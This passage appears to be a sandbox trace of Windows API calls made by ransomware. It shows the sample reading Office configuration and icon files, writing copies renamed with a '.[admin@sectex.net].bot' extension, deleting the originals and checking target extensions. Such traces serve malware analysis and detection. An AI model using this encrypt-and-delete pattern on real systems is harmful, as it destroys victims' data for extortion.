	[0164.536] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2a0, lpOverlapped=0x0) returned 1
	[0164.537] ReadFile (in: hFile=0x3b8, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.537] WriteFile (in: hFile=0x25c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0164.537] SetEndOfFile (hFile=0x25c) returned 1
	[0164.537] CloseHandle (hObject=0x25c) returned 1
	[0164.537] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.537] SetEndOfFile (hFile=0x3b8) returned 1
	[0164.540] CloseHandle (hObject=0x3b8) returned 1
	[0164.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.542] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\secrec.cfg")) returned 1
	[0164.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.552] lstrlenW (lpString=".doc") returned 4
	[0164.552] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.552] lstrlenW (lpString=".docx") returned 5
	[0164.552] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0164.552] lstrlenW (lpString=".pdf") returned 4
	[0164.552] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.552] lstrlenW (lpString=".xls") returned 4
	[0164.552] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.552] lstrlenW (lpString=".xlsx") returned 5
	[0164.552] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0164.552] lstrlenW (lpString=".ppt") returned 4
	[0164.552] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.552] lstrlenW (lpString=".zip") returned 4
	[0164.552] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.552] lstrlenW (lpString=".rar") returned 4
	[0164.552] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.552] lstrlenW (lpString=".bz2") returned 4
	[0164.552] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.552] lstrlenW (lpString=".7z") returned 3
	[0164.552] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.552] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString=".dbf") returned 4
	[0164.553] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString=".1cd") returned 4
	[0164.553] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString=".jpg") returned 4
	[0164.553] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString=".doc") returned 4
	[0164.553] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString=".docx") returned 5
	[0164.553] lstrcmpiW (lpString1=".docx", lpString2="C.CFG") returned -1
	[0164.553] lstrlenW (lpString=".pdf") returned 4
	[0164.553] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString=".xls") returned 4
	[0164.553] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString=".xlsx") returned 5
	[0164.553] lstrcmpiW (lpString1=".xlsx", lpString2="C.CFG") returned -1
	[0164.553] lstrlenW (lpString=".ppt") returned 4
	[0164.553] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString=".zip") returned 4
	[0164.553] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString=".rar") returned 4
	[0164.553] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.553] lstrlenW (lpString=".bz2") returned 4
	[0164.553] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.553] lstrlenW (lpString=".7z") returned 3
	[0164.553] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.553] lstrlenW (lpString=".dbf") returned 4
	[0164.553] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.554] lstrlenW (lpString=".1cd") returned 4
	[0164.554] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SECREC.CFG") returned 64
	[0164.554] lstrlenW (lpString=".jpg") returned 4
	[0164.554] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.554] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0164.554] lstrlenW (lpString="SMIMEE.CFG") returned 10
	[0164.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0164.554] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=640) returned 1
	[0164.554] CloseHandle (hObject=0x37c) returned 1
	[0164.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg")) returned 0x20
	[0164.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0164.555] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.555] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0164.556] GetLastError () returned 0x0
	[0164.556] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x280, lpOverlapped=0x0) returned 1
	[0164.557] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x290, lpOverlapped=0x0) returned 1
	[0164.558] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.558] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0164.558] SetEndOfFile (hFile=0x3ac) returned 1
	[0164.558] CloseHandle (hObject=0x3ac) returned 1
	[0164.558] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.558] SetEndOfFile (hFile=0x37c) returned 1
	[0164.560] CloseHandle (hObject=0x37c) returned 1
	[0164.560] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimee.cfg")) returned 1
	[0164.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.561] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.561] lstrlenW (lpString=".doc") returned 4
	[0164.561] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.561] lstrlenW (lpString=".docx") returned 5
	[0164.561] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0164.561] lstrlenW (lpString=".pdf") returned 4
	[0164.561] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.561] lstrlenW (lpString=".xls") returned 4
	[0164.561] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString=".xlsx") returned 5
	[0164.562] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0164.562] lstrlenW (lpString=".ppt") returned 4
	[0164.562] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.562] lstrlenW (lpString=".zip") returned 4
	[0164.562] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString=".rar") returned 4
	[0164.562] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString=".bz2") returned 4
	[0164.562] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.562] lstrlenW (lpString=".7z") returned 3
	[0164.562] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.562] lstrlenW (lpString=".dbf") returned 4
	[0164.562] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.562] lstrlenW (lpString=".1cd") returned 4
	[0164.562] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.562] lstrlenW (lpString=".jpg") returned 4
	[0164.562] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.562] lstrlenW (lpString=".doc") returned 4
	[0164.562] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString=".docx") returned 5
	[0164.562] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0164.562] lstrlenW (lpString=".pdf") returned 4
	[0164.562] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString=".xls") returned 4
	[0164.562] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.562] lstrlenW (lpString=".xlsx") returned 5
	[0164.562] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0164.563] lstrlenW (lpString=".ppt") returned 4
	[0164.563] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.563] lstrlenW (lpString=".zip") returned 4
	[0164.563] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.563] lstrlenW (lpString=".rar") returned 4
	[0164.563] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.563] lstrlenW (lpString=".bz2") returned 4
	[0164.563] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.563] lstrlenW (lpString=".7z") returned 3
	[0164.563] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.563] lstrlenW (lpString=".dbf") returned 4
	[0164.563] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.563] lstrlenW (lpString=".1cd") returned 4
	[0164.563] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMEE.CFG") returned 64
	[0164.563] lstrlenW (lpString=".jpg") returned 4
	[0164.563] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.563] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0164.563] lstrlenW (lpString="SMIMES.CFG") returned 10
	[0164.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0164.564] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=668) returned 1
	[0164.564] CloseHandle (hObject=0x37c) returned 1
	[0164.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg")) returned 0x20
	[0164.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0164.564] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.564] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0164.565] GetLastError () returned 0x0
	[0164.565] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x29c, lpOverlapped=0x0) returned 1
	[0164.566] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2a0, lpOverlapped=0x0) returned 1
	[0164.567] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.567] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0164.567] SetEndOfFile (hFile=0x3ac) returned 1
	[0164.567] CloseHandle (hObject=0x3ac) returned 1
	[0164.567] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.567] SetEndOfFile (hFile=0x37c) returned 1
	[0164.569] CloseHandle (hObject=0x37c) returned 1
	[0164.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.570] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smimes.cfg")) returned 1
	[0164.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.571] lstrlenW (lpString=".doc") returned 4
	[0164.571] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.571] lstrlenW (lpString=".docx") returned 5
	[0164.571] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0164.571] lstrlenW (lpString=".pdf") returned 4
	[0164.571] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.571] lstrlenW (lpString=".xls") returned 4
	[0164.571] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.571] lstrlenW (lpString=".xlsx") returned 5
	[0164.571] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0164.571] lstrlenW (lpString=".ppt") returned 4
	[0164.571] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.571] lstrlenW (lpString=".zip") returned 4
	[0164.572] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString=".rar") returned 4
	[0164.572] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString=".bz2") returned 4
	[0164.572] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.572] lstrlenW (lpString=".7z") returned 3
	[0164.572] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.572] lstrlenW (lpString=".dbf") returned 4
	[0164.572] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.572] lstrlenW (lpString=".1cd") returned 4
	[0164.572] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.572] lstrlenW (lpString=".jpg") returned 4
	[0164.572] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.572] lstrlenW (lpString=".doc") returned 4
	[0164.572] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString=".docx") returned 5
	[0164.572] lstrcmpiW (lpString1=".docx", lpString2="S.CFG") returned -1
	[0164.572] lstrlenW (lpString=".pdf") returned 4
	[0164.572] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString=".xls") returned 4
	[0164.572] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString=".xlsx") returned 5
	[0164.572] lstrcmpiW (lpString1=".xlsx", lpString2="S.CFG") returned -1
	[0164.572] lstrlenW (lpString=".ppt") returned 4
	[0164.572] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0164.572] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.572] lstrlenW (lpString=".zip") returned 4
	[0164.572] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0164.573] lstrlenW (lpString=".rar") returned 4
	[0164.573] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0164.573] lstrlenW (lpString=".bz2") returned 4
	[0164.573] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0164.573] lstrlenW (lpString=".7z") returned 3
	[0164.573] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0164.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.573] lstrlenW (lpString=".dbf") returned 4
	[0164.573] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0164.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.573] lstrlenW (lpString=".1cd") returned 4
	[0164.573] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0164.573] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMIMES.CFG") returned 64
	[0164.573] lstrlenW (lpString=".jpg") returned 4
	[0164.573] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0164.573] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0164.573] lstrlenW (lpString="SMSL.ICO") returned 8
	[0164.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0164.574] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=10134) returned 1
	[0164.574] CloseHandle (hObject=0x37c) returned 1
	[0164.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico")) returned 0x20
	[0164.574] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0164.574] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.574] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SMSL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\smsl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0164.575] GetLastError () returned 0x0
	[0164.575] ReadFile (in: hFile=0x37c, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2796, lpOverlapped=0x0) returned 1
	[0164.589] WriteFile (in: hFile=0x3ac, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x27a0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x27a0, lpOverlapped=0x0) returned 1
